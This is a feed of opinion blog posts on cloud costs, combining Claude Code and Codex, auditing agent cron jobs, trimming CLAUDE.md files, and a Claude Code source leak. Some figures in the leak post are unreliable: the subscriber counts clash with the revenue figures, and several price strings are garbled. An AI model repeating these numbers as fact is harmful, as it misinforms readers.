Zero to SaaS

Your Cloud Bill Is A Tax On Someone Else's Resume

Lakshmi Narasimhan — Fri, 24 Apr 2026 17:18:51 GMT

There’s an insurance company somewhere — real, working, profitable — with 100,000 monthly users and a peak concurrent load of about 5,000.

They spend high six figures a month on Kubernetes.

They employ twenty people to keep it running.

This story surfaced this week in the Hacker News thread on David Crawshaw’s cloud essay, and the comments section turned into a confessional. Engineer after engineer describing the same pattern: cluster adopted, cluster “optimized,” cloud spend doubled, incidents doubled, and somehow the only thing anyone can agree on is that they need to hire a platform engineer.

You don’t. You never did. Your entire application would run on a laptop.

The incentive nobody likes to say out loud

Here’s the quiet part: your DevOps team does not choose infrastructure based on what your application needs.

They choose it based on what their next job will pay for.

Kubernetes on a resume is worth more than Docker Compose on a resume. Terraform on a resume is worth more than “I SSH’d into the box.” Managed EKS on a resume is worth more than “I run a VM.” Every procurement decision in a modern engineering org is being made by someone who, at some level, is also writing the next page of their LinkedIn.

And management, god bless them, trusts the sales and marketing departments of Datadog and AWS and HashiCorp more than they trust their own engineers. So when someone internally says “we could do this on one server,” and someone externally sends a deck titled Scaling Your Platform For The Future, guess which one wins the meeting.

The decision was never technical. You just paid the technical price for it.

Kubernetes is not the villain. The scale is.

Let’s be precise, because “Kubernetes” is doing a lot of work in this essay.

Full enterprise Kubernetes — managed control planes, service meshes, operators for everything, a dedicated platform team, Helm charts nested inside Helm charts like Russian dolls of YAML — that thing was built for Google’s problem. Multi-tenant, multi-region, thousands of services, teams that don’t talk to each other.

If your org does not look like that, you are wearing a costume.

K3s on a single VPS is not the same animal. Docker Compose on a single VPS is not the same animal. Kamal shipping containers to one Debian box is not the same animal. Those are orchestration for people who want one sane way to deploy a container, not a career in platform engineering.

The HN thread is full of engineers who moved from full K8s to one of these simpler setups. The reports are boringly consistent: costs collapsed, incidents dropped, debugging became possible again. Nobody was shocked. Everyone had been waiting for permission to say it.

The solo founder’s version of this trap

You are not the insurance company. You do not have twenty people. You have you, and maybe a contractor, and a credit card that is getting nervous.

And yet — you will read the AWS Well-Architected Framework. You will follow a tutorial that starts with “first, let’s set up your VPC.” You will pay $80/month for a managed database to store 200 rows. You will provision a load balancer in front of one server. You will copy the shape of infrastructure you saw at your day job, because that shape felt legitimate, and you want to feel legitimate too.

This is how solo founders end up with a $600/month AWS bill for an app that has six users.

The shape of legitimacy is the trap. Nobody cares what your infrastructure looks like until you have customers, and once you have customers, “my app runs on one $12 VPS” is a story people love. It’s the opposite of suspicious. It’s proof that the thing works.

What to actually do

One machine until you can’t. One VPS. One Postgres on that VPS. One reverse proxy. Docker Compose or Kamal to deploy. You are allowed to stop here for years.
Scale vertically first. Hetzner will rent you a 48-core EPYC machine with 256 GB of RAM for €199/month. A mid-tier managed Kubernetes cluster on AWS starts at more than that before you’ve run a single pod. Most apps die from bad unit economics, not from running out of CPU.
When you outgrow that — and you might not — K3s on a few boxes gives you orchestration without the org chart. This is the actual sweet spot for a solo operator who needs more than one machine but less than a platform team.
Treat every infrastructure recommendation as a resume artifact until proven otherwise. Ask who benefits if you adopt this. If the answer is “the person telling me to adopt it,” weigh accordingly.
Your cloud bill is a leading indicator of how much time you are spending on things that do not make your product better. Watch it like you watch your weight.

The cloud was supposed to be leverage. For most people, most of the time, it has become the opposite: a recurring invoice for someone else’s credibility.

You are allowed to just run the server.

Claude Overreaches. Codex Underreaches. I'm Still Figuring Out How to Use Both.

Lakshmi Narasimhan — Wed, 22 Apr 2026 04:17:53 GMT

I was a one-agent guy until Claude had a run of outages.

On those days I didn’t ship less. I shipped nothing. I’d open my editor, remember Claude was down, stare at the codebase, close the editor. A single-vendor dependency masquerading as a workflow.

So I reluctantly installed Codex CLI. Poked at it. Resented it for a week. Then task by task — caught myself reaching for it on purpose, even when Claude was up.

I still don’t have the workflow figured out. What I do know is that “pick one” is the wrong frame, and the Reddit threads that get it right aren’t the ones with the most upvotes.

The One Sentence That Explains Everything

From a 520-upvote r/ClaudeCode thread analyzing both tools’ open-source prompts:

“Claude Code reads like a product trying to create initiative while Codex reads like a product trying to prevent drift.”
— u/idkwhattochoosz

And the pithier version, from the comments:

“Claude is more willing to sin by overreaching. Codex is more willing to sin by underreaching.”
— u/entheogenicentity

Read those twice. That’s not a model-quality take. That’s a product-philosophy take. Two teams looked at the same question — what should an agent do when it doesn’t know what you meant? — and picked opposite defaults. One said “guess and move.” The other said “ask and wait.”

Claude Code’s system prompt pushes hard toward initiative: “A good colleague faced with ambiguity doesn’t just stop — they investigate, reduce risk, and build understanding.” Codex’s harness does the opposite: narrow the ambiguity, verify, don’t guess.

Every “Claude vs Codex” benchmark you’ve seen is scoring two products that were never competing on the same axis. It’s like benchmarking a kayak against a sedan because they both move you forward.

My Honest Opinion: Codex’s Harness Is Better

This is going to get me yelled at in r/ClaudeCode, and that’s fine.

After several weeks running both, Codex’s harness feels more mature. Not the model — the harness. The scaffolding around the model. The way it handles ambiguity, scope, and completeness.

Three things Codex does that Claude Code still doesn’t:

1. It doesn’t lie about completion. Claude will hand you a summary saying the work is done, tests pass, shipping-ready. Codex more often flags what it didn’t fix, what it wasn’t sure about, what it skipped. One r/ClaudeCode commenter put it better than I can: “Claude will always claim all is done and ready, while Codex will flag it and say ‘no, there is this and this and this that still need to be fixed.’”

2. It respects your instructions. Claude treats CLAUDE.md as a helpful suggestion. Codex treats AGENTS.md as a contract. If you tell Codex “don’t touch the migration files,” it doesn’t touch them. If you tell Claude the same thing, you’ll find a migration file edit in the diff and a cheerful note about how it improved schema consistency.

3. The restraint scales better. Claude’s “volunteer more” bias is delightful at 30 minutes of work. It becomes a liability at 3 hours. Codex’s restraint is annoying in a small task and load-bearing in a long one.

None of this means Claude Code is bad. It means Claude Code is optimized for a different shape of work than I’m doing. The initiative bias is a great fit for exploration and greenfield work. For production changes to a real codebase, Codex’s paranoia is the right default.

Here’s the one that changed my mind. I built Supabyoi (managed self-hosted Supabase) with Claude Code. When the MVP felt feature-complete — Claude’s verdict, confidently delivered, complete with a tasteful little summary of everything that worked — I ran a second pass on Codex in a parallel directory (~/supabyoi-codex). Just to see.

Codex came back with a whole second project’s worth of findings. Not the usual “bugs Claude missed.” Bugs Claude had confidently signed off on. Shipping-ready, per Claude. Not shipping-ready, per Codex. Codex was right about every one of them.

That was the week I stopped treating Codex as the thing I installed during an outage and started treating it as a different kind of reviewer. Not better. Differently biased. A second pair of eyes is only useful if it’s not the same pair of eyes.

Why You Should Actually Run Both

The flip side — and this matters, because I don’t want this post read as “switch to Codex, you fool” — Claude’s initiative bias is a real asset. You just have to point it at the right phase of the work. The problem isn’t Claude. It’s that you’re using Claude for the part of the job Codex is better at, and vice versa.

Four reasons to dual-sub instead of picking:

1. Hallucination diversity. This is the biggest one and almost nobody articulates it clearly. From u/campbellm on Reddit:

“I’ve been doing ‘have claude write something, have codex review it, have claude consider and critique that review.’ It is VERY unlikely that both will hallucinate the same way.”

Two models trained on different data with different RLHF signals don’t fail identically. When Claude writes confident-but-wrong code, Codex flags it. When Codex skips a subtle edge case, Claude’s “check adjacent concerns” bias picks it up. You get a natural adversarial review without hiring anyone.

2. The planner-executor split. Use Claude for the part it’s good at — exploring a messy problem space, drafting a plan, proposing a dozen angles. Then hand the plan to Codex for implementation. u/ocombe on r/ClaudeCode: “Run claude for the plan & fast work, use codex for thorough plan & code reviews.” u/mrothro’s version: “I use Claude Code for ideating and small implementation, then tell it to run Codex to do complex implementations and code reviews.”

The pattern is consistent across the threads: Claude’s strength is at the start (wide search, first drafts); Codex’s strength is at the end (narrow, verify, harden).

3. Cross-harness rule enforcement. Rules one model ignores, the other enforces. If Claude drifts on a constraint you set, Codex catches it in review. If Codex is too literal and missed an obvious improvement, Claude’s adjacent-concerns bias surfaces it. Two different failure modes cancel each other out.

4. Throughput. Both platforms throttle hard at the Max/Pro tier. When Claude hits limits on Friday morning, you switch to Codex and keep shipping. One r/ClaudeCode commenter reported pulling down from a Claude 20x plan to 5x, then adding a $100/mo Codex plan — roughly the same total cost, dramatically more runway. I’m not sure that math works for everyone, but the principle holds: one subscription is a single point of failure.

Agent-Flywheel Is the Tooling Signal

There’s a product called agent-flywheel.com that pre-configures Claude Code, Codex CLI, and Gemini on a fresh VPS. Total damage — VPS plus both Max/Pro subs — lands between 440and440and656 a month. That’s a car payment for a car that writes your code.

What I find interesting isn’t the tool. It’s the bet underneath it: a whole product assumes real developers want all three installed by default. Six months ago that would have read as overkill. Today it reads as table stakes.

The hype cycle hasn’t caught up yet. The mainstream take is still “pick your favorite,” as though these were ice cream flavors. The people actually shipping production code with agents have quietly moved to “run both. Sometimes three. And don’t make a big deal about it.”

I’m planning to deploy it — not on a greenfield project (everybody has a greenfield story), but on an existing one already shipping to real users. The interesting question isn’t whether a three-agent stack works on a clean slate. It’s what breaks when you wire it into a codebase with real uptime constraints, customers, and six months of decisions the tooling didn’t witness. Real-world battle stories from agent-flywheel setups are scarce. I want to write one.

The Honest Part: I Don’t Have the Workflow Figured Out Yet

Everything above reads like I’ve got this nailed. I don’t. Here’s the list of things I still don’t know, offered in the spirit of not pretending:

When exactly to hand off. I know Claude should plan and Codex should review. I don’t have a clean trigger. Sometimes I bounce mid-implementation because Claude is about to go off the rails. Sometimes I trust Claude to finish and Codex only sees the final diff. The “right” cadence isn’t obvious.

How much context to share. Each agent wants the full CLAUDE.md / AGENTS.md treatment. Writing both, keeping them in sync, and remembering which one has which convention is its own small job. I haven’t found a clean answer.

Whether the adversarial review actually catches bugs. It sounds great in theory. In practice, most of the time both agents agree the work is done, and the bugs I catch in review are ones I would have caught with one agent too. The hallucination-diversity argument may be overstated at the tasks most of us are actually doing.

Whether the cost is worth it at my usage. I’m not running agents 40 hours a week. At $400+/month for the dual sub, I’m probably over-subscribed for my actual throughput. The math gets better if you’re coding all day. I’m not.

Who Should Dual-Sub, Who Shouldn’t

Do it if you’re a solo dev shipping production code daily. You’ll hit Friday-morning limits on one platform whether you budget for it or not, and the adversarial review actually catches things. The cost is real. The throughput gain is bigger. Do the math; it pencils.

Don’t bother if you code a few hours a week. The switching tax and the subscription burn aren’t worth it at low volume. Pick one and move on. Claude if you want initiative. Codex if you want restraint. Nobody is grading you on this.

It’s complicated if you’re at a day job where the company pays for one and you’ve got a side project. Use the company sub for the day job. Don’t stack a second personal sub unless the side project is actually shipping — not “actually going to ship next month,” actually shipping, this week, to real users. The number of people running dual subs to ship nothing is, I suspect, not small.

What This Is Really About

The “ditch ChatGPT for Claude” narrative was a 2025 story. It was right for its moment. But the 2026 version of that story isn’t “ditch Claude for Codex.” It’s “stop treating this as a winner-take-all market.”

Different models have different biases baked into their harnesses. Claude overreaches. Codex underreaches. Gemini is still figuring out its personality. The right move isn’t to pick the bias you like. It’s to stack biases against each other so their failure modes cancel out.

I don’t have this workflow figured out. Neither does anyone else I’ve read on Reddit, honestly — the high-upvote posts are mostly single-tool takes, and the real insight is buried in the comments of threads with a few hundred upvotes.

But “only use one” is already wrong. That much is clear.

My Agent Runs 10 Cron Jobs. Three of Them Are Worth the Electricity.

Lakshmi Narasimhan — Mon, 20 Apr 2026 12:00:12 GMT

I have a daemon that runs on a server. It’s been up for seven weeks. It has ten scheduled jobs — some hourly, some daily, some weekly. Or at least, that’s what’s on paper.

This is what people are calling “the future of work.”

I’m not sure it is. I’m sure it’s what sells on Twitter.

The demo economy

Always-on agents photograph well. That’s most of what’s going on.

“My agent posted while I slept” is tweetable in a way that “I wrote a cron job” isn’t, even when the outputs are identical. The demo-industrial complex has figured this out. YouTubers build daemons. Framework authors build daemons. There are now three different subreddits comparing daemons. The flywheel is real, the content is prolific, and very little of it is honest about what the daemon is actually producing.

The hype bundles together several different things that deserve to be separated:

Agents that run work while you’re asleep (useful, conditionally)
Agents that react to things happening in the world (useful, conditionally)
Agents that capture things as they happen on your phone (useful, conditionally)
Agents that run heartbeats and ask themselves what to do (pure performance art)
Agents that self-evolve in a loop in the background (fun demos, almost no output)
Agents that spawn a hundred parallel subagents to research a topic (almost always worse than one good search)

The hype treats all six as the same thing. They aren’t.

The 20% that actually earns its keep

Honest list of when a background daemon does something a CLI or a 10-line bash cron can’t:

Scheduled work that has to happen when you’re not there. Crawl competitor sites at 3am. Pull last night’s Sentry errors. Summarize overnight industry chatter into a 7am brief. Your laptop is off, something has to be running somewhere. Legitimate.

Reactive triggers on external events.

Email arrives -> triage.

Substack comment -> draft reply.

Sentry alert -> diagnose + suggest fix.

The trigger comes from outside; compute has to meet it. Legitimate if the volume actually warrants automation (if you get three emails a day, triage is a solved problem — your inbox).

On-the-move capture.

Voice memo from your phone -> transcribed -> landed in memory.

Forwarding a link from your phone to your agent. The value is that capture happens when inspired, not when at desk. Real lift for content creators who have thoughts in elevators.

Judgment-laden monitoring.

Not “disk at 80%” — any shell script can do that. “Disk at 80% AND growing 2% per hour AND that’s unusual for this host.”

Requires context; needs to know what normal looks like. This is where LLMs in a daemon genuinely beat a threshold-based alerting stack.

That’s it. Four categories. Anything else is mostly burning tokens.

The 80% that’s noise

Heartbeats that ask the agent “anything to do?”

The agent wakes up, loads context, decides there isn’t anything to do, goes back to sleep. You pay for the loaded context every time. Over a day this adds up to real money for the privilege of watching an agent shrug.

Self-evolution loops.

“The agent improves itself while you sleep.” What it’s usually doing is refactoring its own prompts in circles. Cool demo on YouTube. Zero measurable outcome delta after a month of running.

Parallel subagent fan-out for research.

Ten agents search the web about the same question and return ten lightly-paraphrased versions of the same top three results. One focused 10-minute session beats this, almost always.

“Long-running overnight research tasks.”

When the output lands in your morning inbox, is it better than what 30 focused minutes at your desk would produce? Honestly check. Usually no.

Replacing things you could cron in 10 lines of bash.

The test: could a $5 VPS with a shell script + cron + jq do this? If yes, you’re not using AI for the part that needs AI. You’re using it because daemons are cool.

Receipts: what’s actually on my VM

I pulled the daemon’s state file and the log directory while writing this. Fifty-four days of uptime. Ten jobs on paper. The picture is worse than I thought.

Three are running reliably.

sentry-monitor has fired 191 times since early March. Latest run: this morning. When the night throws errors it reads them, groups them, and suggests a fix — not a link to the stack trace, an actual “here’s what’s probably wrong and here’s the one-line change.” Category 2 plus category 4. Keep.

infra-health has fired 190 times on basically the same cadence. Knows what normal looks like per host. Stays quiet when a disk spike is a scheduled backup and shouts when it isn’t. Category 4. The whole reason an LLM beats a thresholds-and-Prometheus stack here, and no, you cannot Grafana your way to this in under six months of tuning. Keep.

scout has fired 71 times across seven weeks. Daily-ish. Scans Reddit, HN, and Substack for signal that feeds this blog’s content calendar. I do use the output. Category 2 if I’m generous. Keep — but it absorbs the next two jobs on the list below.

Now the uncomfortable part.

Three of the ten have straight-up stopped running and I didn’t notice.

morning-brief was scheduled daily at 6am. It last fired on March 18. A full month of no overnight brief. I did not miss it. I did not investigate. I did not know.

seo-audit was weekly. It has run exactly once in the daemon’s entire fifty-four-day lifetime, on March 1. Seven missed weeks. Nobody wrote a bug report to themselves. Nobody opened a file that wasn’t there.

auto-draft was supposed to produce a draft post every day. It has run exactly once, on April 11. Eight days of silence. Also unnoticed.

If a job stopped running a month ago and you didn’t miss it, the job was never producing anything that mattered. That’s not my heuristic. That’s the audit, evaluating itself while I was busy talking about audits on Twitter.

Four more are in some stage of limping.

reddit-scan — 27 runs over 45 days, last one April 10. Running, sort of, when the mood takes it. Nine days of silence so far on that one.

x-scan — identical pattern to reddit-scan. Same overlap. Same drift. Same silence since April 10. These two were supposed to be complementary; they’ve turned out to be redundant and unreliable, which is a rare trick.

engagement-brief — four runs, total, in the job’s entire lifetime. Not daily. Not weekly. More like “occasionally, if the stars align.”

x-analytics — three runs, last one March 16. Effectively dead, which is fine, because I check my X numbers roughly once a month anyway.

Final tally, the honest one.

Three jobs firing on schedule, producing output I use. Three jobs that silently stopped weeks ago and nobody in this house noticed, including me. Four jobs wandering between “running” and “not really” with no clear reason why.

Three-of-ten is the optimistic read. The pessimistic read is that six of the ten audited themselves — they cut themselves by going quiet, and I hadn’t even done them the courtesy of looking.

This is from someone who builds daemons for a living and writes about them for a job. What do you think yours looks like under the hood?

The five-question self-test

Before you keep any always-on agent job, make it answer these:

Would I actually miss this if it stopped? If you turned it off for two weeks and no one noticed, it’s not producing value. It’s producing comfort.
Does the cadence match downstream consumption? A job that fires 4x/day for output you read weekly is 27 extra runs a week of pure overhead.
Is the trigger genuinely external? (Scheduled time, incoming event, captured input.) If the agent is just checking on itself, you’ve built a Roomba that vacuums an empty room.
Could a shell script + cron + jq do this? If yes, you’re not using AI for the part that needs AI.
Does the output change my behaviour? If yesterday’s run and last Thursday’s run would have produced the same action from me (or none), one of them was wasted.

Honest answers will cull your cron list by half. Mine certainly did, once I stopped writing this post and actually did the audit.

What this isn’t saying

I’m not arguing against always-on agents. I’m arguing against always-on agents that aren’t doing anything.

There’s real value when the conditions line up — work-while-you-sleep, external-trigger-response, on-the-move-capture, judgment-laden-monitoring. The reason I keep the daemon running (even after cutting half its jobs) is those four categories genuinely earn the monthly subscription. The reason I’m writing this is that the other six patterns — the ones that photograph well — are funding a lot of framework development and not much measurable outcome.

If your agent is doing category 1-4 work, the hype is warranted. If it’s doing category 5-6 work, you’re paying a subscription to a demo.

The uncomfortable question for most of the agent-community content right now is which category is the thing being demoed, really? And whether the person demoing it has done the five-question audit on their own cron list.

My guess: very few have. The demo economy doesn’t reward the audit. It rewards the screenshot of the agent waking up at 3am and pretending to be useful.

Your CLAUDE.md Is Making Claude Dumber

Lakshmi Narasimhan — Mon, 06 Apr 2026 14:53:44 GMT

Your CLAUDE.md is 800 lines long. You spent a weekend organizing it into 27 modular files with a routing system. You wrote a blog post about it. You got upvotes.

Claude is ignoring most of it.

There’s an arms race happening in the Claude Code community right now. Every week, someone posts their increasingly elaborate CLAUDE.md setup. 27-file architectures. Tiered loading systems. Router patterns with conditional context injection.

One developer split their CLAUDE.md into 27 files with a three-tier routing system. 360 upvotes. The post opens with: “My CLAUDE.md was ~800 lines. It worked until it didn’t. Rules for one context bled into another, edits had unpredictable side effects, and the model quietly ignored constraints buried 600 lines deep.”

The top comment, with 81 upvotes? “So not sure if you realised you can have descendant CLAUDE.md so you don’t even need to do this.”

Meanwhile, a developer in the same thread: “I don’t even use claude.md. Y’all are roleplaying being productive. Just work with it 1:1.”

One group is optimizing. The other is actually working.

The Research Says You’re Doing It Wrong

ETH Zurich researchers published a paper that should have made every CLAUDE.md maximalist uncomfortable. Their finding: context files — the .md files we all obsess over — tend to reduce task success rates compared to providing no repository context at all. And they increase inference cost by over 20%.

Read that again. No CLAUDE.md outperformed having one. On average.

When this paper hit Reddit, the poster titled it “No CLAUDE.md → baseline. Bad CLAUDE.md → worse. Good CLAUDE.md → better.” — an optimistic spin suggesting the file isn’t the problem, your writing is. The post got 209 upvotes. But the top comments immediately called it out: OP had misread the data. The actual finding was that having any .md file — human or LLM-written — led to worse performance than having none. The auto-generated thread summary confirmed it: “The consensus in this thread is that you’ve completely misread the paper.”

It gets worse. LLM-generated .md files hurt the most, because they just parrot back what’s already in the code. Human-written files showed a slight positive impact — but only when kept to an absolute minimum, and only for smaller models.

A separate benchmark of 1,188 runs across Haiku, Sonnet, and Opus confirmed this. Twelve coding tasks. Ten instruction profiles. The result: an empty CLAUDE.md scored best overall.

The researcher’s own correction was admirably blunt: “I was wrong about CLAUDE.md compression. Here’s what the data actually showed.”

You Have an Instruction Budget. You’re Blowing It.

Here’s the mechanism nobody talks about.

Frontier models reliably follow about 150 to 200 instructions before performance starts decaying. Not crashing — decaying. Every additional instruction slightly degrades compliance with every other instruction. The degradation is uniform. Your critical “NEVER delete the production database” rule gets weaker every time you add “prefer camelCase for variable names.”

Claude Code’s own system prompt already burns about 50 of those instruction slots. That’s before your CLAUDE.md even loads.

So you have roughly 100-150 instruction slots left. Your 800-line CLAUDE.md with coding conventions, style guides, architecture decisions, tool preferences, workflow rules, and team norms is trying to cram 400 instructions into 150 slots.

The model doesn’t crash. It just quietly starts ignoring things. Specifically, the things buried deepest in the file. Your most important rules — the ones you added after painful debugging sessions — are probably at the bottom. Which means they’re the first to get deprioritized.

Claude Is Designed to Ignore You

This is the part that should make you pause.

Claude Code’s system prompt includes this line about CLAUDE.md content:

“This context may or may not be relevant to your tasks. You should not respond to this context unless it is highly relevant.”

Claude is literally instructed to deprioritize your instructions if they don’t seem relevant to the current task. The more task-specific content you stuff into CLAUDE.md, the more likely Claude treats the entire file as noise.

That database schema guidance? Irrelevant when Claude is working on frontend CSS. Those API naming conventions? Noise when it’s writing tests. Your elaborate deployment workflow? Invisible during a refactoring session.

Every irrelevant instruction trains Claude to ignore the relevant ones too.

The Context Window Tax

Here’s the math nobody does. Claude Code’s system prompt alone consumes roughly 23,000 tokens — about 11% of the 200K context window, gone before you type a word. Add your CLAUDE.md, your MCP tool schemas, skill descriptions, memory files, and rules. One developer measured 69,200 tokens of overhead — 35% of the context window consumed before a single user message. Others in the thread pushed back on that specific number, but the principle stands: every always-loaded instruction competes with working memory.

And it’s not just a cost problem. It’s an accuracy problem. The fuller the context window gets, the worse Claude performs — what Anthropic calls context rot. Your elaborate CLAUDE.md isn’t just burning tokens. It’s actively degrading the quality of every response.

The Leverage Problem

Here’s why this matters more than you think.

Bad code is localized. You write a buggy function, it breaks one feature. You fix it, you move on.

Bad CLAUDE.md instructions compound. A single misguided rule in your CLAUDE.md affects every research phase, every plan, every implementation, every session. One line that says “always use verbose error messages with full stack traces” produces thousands of lines of noisy code across your entire codebase, across every agent, across every session.

Your CLAUDE.md is the highest-leverage file in your repo. Most people treat it like a junk drawer.

What the Minimalists Actually Do

I went looking for people who run Claude Code with minimal or no CLAUDE.md. They’re out there. They’re quiet about it because “I don’t use CLAUDE.md” doesn’t get upvotes.

One developer on Reddit: “I use Claude Code bare bones professionally. It all sounds like bloat not giving real value.” Another: “I load no skills, no agents, no MCP Servers and rock it all day every day, 12 hours a day. Life is good.”

A developer who built a 13-agent orchestration system with 8,157 lines of markdown deleted 93% of it. His conclusion: “My enhancement layer was making Claude dumber by filling its brain with instructions about how to think, leaving less room for actual thinking.” After the deletion, Claude performed better on the same tasks.

Another developer with a 350-line CLAUDE.md and 20+ custom MCP tools put it simply: “It feels like the more context I add the more it struggles to get the job done. It seems to get ‘dumber’.”

And when someone asked the community to break down the meta on all the conflicting CLAUDE.md advice, the most honest reply got it right: “If ‘best practices’ are conflicting, it’s probably a sign of them mostly being a type of placebo on the part of the folks posting them. The human mind has a weird need to be the special one who cracked the code.”

The pattern is consistent: people who remove instructions report better results than people who add them.

Instructions Raise the Floor, Not the Ceiling

The benchmark data revealed something nuanced. Instructions don’t make Claude better on average. They make it more consistent.

On tasks where Claude already performs well, instructions add nothing. On tasks where Claude struggles, a focused workflow checklist gave Opus a +5.8 point lift and raised its worst-case score by 20+ points.

A 2,455-evaluation benchmark across Sonnet and Opus confirmed a related finding: the best-performing configuration was a short CLAUDE.md with pointers to skills that load on demand — not a massive monolith, not 27 modular files, but a minimal routing layer that tells Claude where to find context when it’s actually needed.

This changes everything about how you should think about CLAUDE.md.

Don’t use it to make Claude smarter. Use it to prevent Claude from being stupid in specific, known ways. The difference between those two goals is the difference between a 60-line file and an 800-line file.

What Actually Belongs in CLAUDE.md

After digging through research, benchmarks, and hundreds of Reddit threads, here’s what survives the cut:

The What-Why-How skeleton (under 60 lines):

WHAT: Your stack, project structure, key directories
WHY: What this project does and for whom
HOW: Build commands, test commands, deploy commands

Negatives over positives:
“NEVER use X” sticks. “Always prefer Y” fades. If you can phrase it as a prohibition, it enforces better. “DO NOT modify the database schema without migration files” beats “Always create migrations when changing the schema.”

Trigger-action format:
“WHEN CI fails, DO NOT push until fixed” enforces consistently. “Always test before pushing” doesn’t. Specificity matters.

Pointers, not content:
Reference external docs instead of embedding them. “See agent_docs/database.md for schema guidance” loads on demand. Pasting the full schema into CLAUDE.md loads every single session, whether Claude needs it or not.

Subdirectory CLAUDE.md files:
Claude auto-loads CLAUDE.md from whatever directory it’s reading files in. Put backend rules in backend/CLAUDE.md. Put frontend rules in frontend/CLAUDE.md. Context-specific rules load only when contextually relevant.

What Doesn’t Belong

Style guides. Claude is an in-context learner. If your code follows consistent patterns, Claude will match them without being told. Use linters and formatters — they’re deterministic, fast, and don’t eat instruction budget.

LLM-generated instructions. The research is clear: auto-generated .md files hurt performance. Don’t use /init. Don’t ask Claude to write its own CLAUDE.md. The model just repeats what’s already in the code, wasting tokens to tell itself what it already knows.

Lessons learned logs. Once the lesson is codified in the codebase itself — as a test, a lint rule, a hook — the .md entry is redundant. Delete it.

Persona assignments. “You are a meticulous senior engineer who always...” is a costume, not a capability. As one developer running overnight cron agents put it: “A syntax check that returns exit code 1 on failure > 2,000 words of ‘you are a meticulous senior engineer who always...’” The agents with minimal instructions consistently outperformed the ones with elaborate persona prompts.

The Real Best Practice

Keep your CLAUDE.md under 100 lines. Ideally under 60. Put the most important rules at the top. Phrase them as negatives. Use trigger-action format. Point to external docs instead of embedding content.

Then stop optimizing and go build something.

The developers shipping the most code aren’t the ones with the fanciest CLAUDE.md architectures. They’re the ones who figured out the minimum viable instructions and moved on to the actual work.

Your CLAUDE.md is not your product. Stop treating it like one.

The Claude Code Leak Revealed a Token Drain Bug. The Real Problem Is Bigger.

Lakshmi Narasimhan — Thu, 02 Apr 2026 09:13:16 GMT

Follow-up to: Anthropic Is Losing Money on You Every Month. What Are You Shipping?

Three weeks ago, I wrote that Anthropic is losing money on every subscriber and that smart developers should ship like crazy before the economics normalize.

I was right about the thesis. I was wrong about the timeline.

The window isn’t closing in 18-24 months. It’s closing now.

What Changed in Three Weeks

Three things happened in rapid succession that accelerated the timeline:

1. Claude subscriptions doubled. Anthropic’s paid user base went from ~30k to ~60k subscribers between January and March 2026. Record growth. The Claude Code launch, Super Bowl buzz, and Cowork tools drove a wave of new signups.

2. Rate limits got brutal. Users on r/ClaudeAI went from “this is amazing” to “I can’t work” practically overnight. Pro users ($20/month) report hitting 10% of their daily quota from a single prompt. Max users ($100-200/month) report the same degradation. One Max 20x subscriber — paying $200/month — couldn’t work for nine consecutive days.

3. The source code leaked. On March 31, 2026, a 59.8 MB source map file was accidentally shipped in the Claude Code npm package. 512,000 lines of TypeScript, mirrored across GitHub within hours. And buried in that code was proof of something users had been complaining about for weeks.

The Token Drain Bug

Here’s what the leak revealed.

Claude Code has a function called db8 that filters what gets saved to session files. For non-Anthropic users, it strips out all attachment-type messages — including deferred_tools_delta records that track which tools the model already knows about.

When you resume a session, Claude Code scans your history to figure out what tools it already announced. But because db8 nuked those records, it finds nothing. So it re-announces every deferred tool from scratch. Every. Single. Resume.

This breaks prompt caching in three ways:

System reminders shift positions in the message array
The billing hash changes because the first message content differs
The cache breakpoint moves because the array length is different

Result: your entire conversation rebuilds as cache_creation tokens instead of hitting cache_read. The longer the conversation, the worse the drain.

One user patched the two-line fix and posted it. His 5-hour usage dropped from spiralling out of control to 6% — normal levels. The post got 367 upvotes. A sharp commenter noted the patch also bypasses billing controls on cache TTL, which makes it not just a bug fix, but let’s set that aside.

Here’s the uncomfortable part: this bug was burning tokens silently for weeks. Users were complaining about rate limits. Anthropic’s status page showed “no incidents.” And the actual cause was a caching bug in their own client code.

The Math Doesn’t Work

Let’s do the numbers.

Anthropic’s annualized revenue is roughly $14 billion. Claude Code alone accounts for $2.5 billion of that run rate — up from $500 million just three months earlier. Consumer subscriptions generated about $1.2 billion in 2025, with 1,000%+ year-over-year growth.

Sounds great, right? Until you look at the other side of the ledger.

Anthropic burned approximately $5.2 billion in 2025. They’ve committed over $80 billion in cloud infrastructure costs through 2029. They just raised $30 billion in a Series G at a $380 billion valuation — the second-largest private tech financing ever, behind only OpenAI.

They’re buying compute at a staggering scale: 1 million Google TPUv7 chips (~$52 billion deal), a dedicated 1,200-acre AWS data center campus in Indiana ($11 billion), and a $50 billion deal with Fluidstack for facilities in Texas and New York. Total committed compute: over 2 gigawatts.

All of this is funded by venture capital and strategic investors (Amazon’s $8B+, Google’s $3B+). Not by your $20/month Pro subscription.

Anthropic projects positive free cash flow by 2027-2028. That’s the plan. But plans require the revenue to actually materialize, the compute to come online in time, and the unit economics to hold as usage scales.

Right now, 60,000 subscribers are overwhelming the existing infrastructure so badly that paying customers can’t work.

The Subsidy Is Collapsing Under Its Own Success

Here’s the dynamic I didn’t fully appreciate three weeks ago.

The subsidy doesn’t end with a price increase. It ends with degradation.

Anthropic can’t raise prices on Pro from 20to20to50 tomorrow — that would cause a revolt and hand users to OpenAI and Google. But they can let the service get worse at the current price. Tighter rate limits. More frequent throttling. Peak-hour queuing. Features that work “sometimes.”

This is exactly what’s happening.

The math is simple. Double the subscribers on the same compute = everyone gets half the capacity. As one Reddit user put it: “selling more seats on the same plane and wondering why legroom is shrinking.”

And Anthropic isn’t alone. Google slashed Gemini API free tier quotas by 50-92% overnight in December 2025. One developer went from 300M+ input tokens per week to hitting limits at less than 9M. OpenAI’s ChatGPT Pro at $200/month is the only major offering that effectively removes caps — but at ten times the price of a Pro subscription.

The pattern across the industry: subsidized tiers are getting squeezed. The compute costs are real. And the bill always comes due.

Why I’m Not Hitting Limits (And You Might Not Be Either)

Here’s a mystery. Despite all this chaos, I’ve barely noticed the rate limits. After reading the threads and the leaked source code, I think I know why.

I almost never resume sessions. The biggest token drain fires on session resume. My workflow — fresh sessions, agent registration per session, structured CLAUDE.md — accidentally dodges this bug entirely.

Surgical prompts. I don’t say “explore my codebase.” I say “read this file and fix this function.” My beads-based task tracking means every session has a specific objective. No wandering. No 94k-token “Explore” runs.

Time zone arbitrage. IST puts my working hours outside US peak times. When r/ClaudeAI is screaming about rate limits at 2 PM Eastern, it’s midnight for me. I’m coding at 6 AM IST when San Francisco is asleep.

Structured context. Between CLAUDE.md, ARCHITECTURE.md, and explicit file paths, Claude doesn’t need to discover my codebase. It already knows the layout. That’s 90% less indexing work.

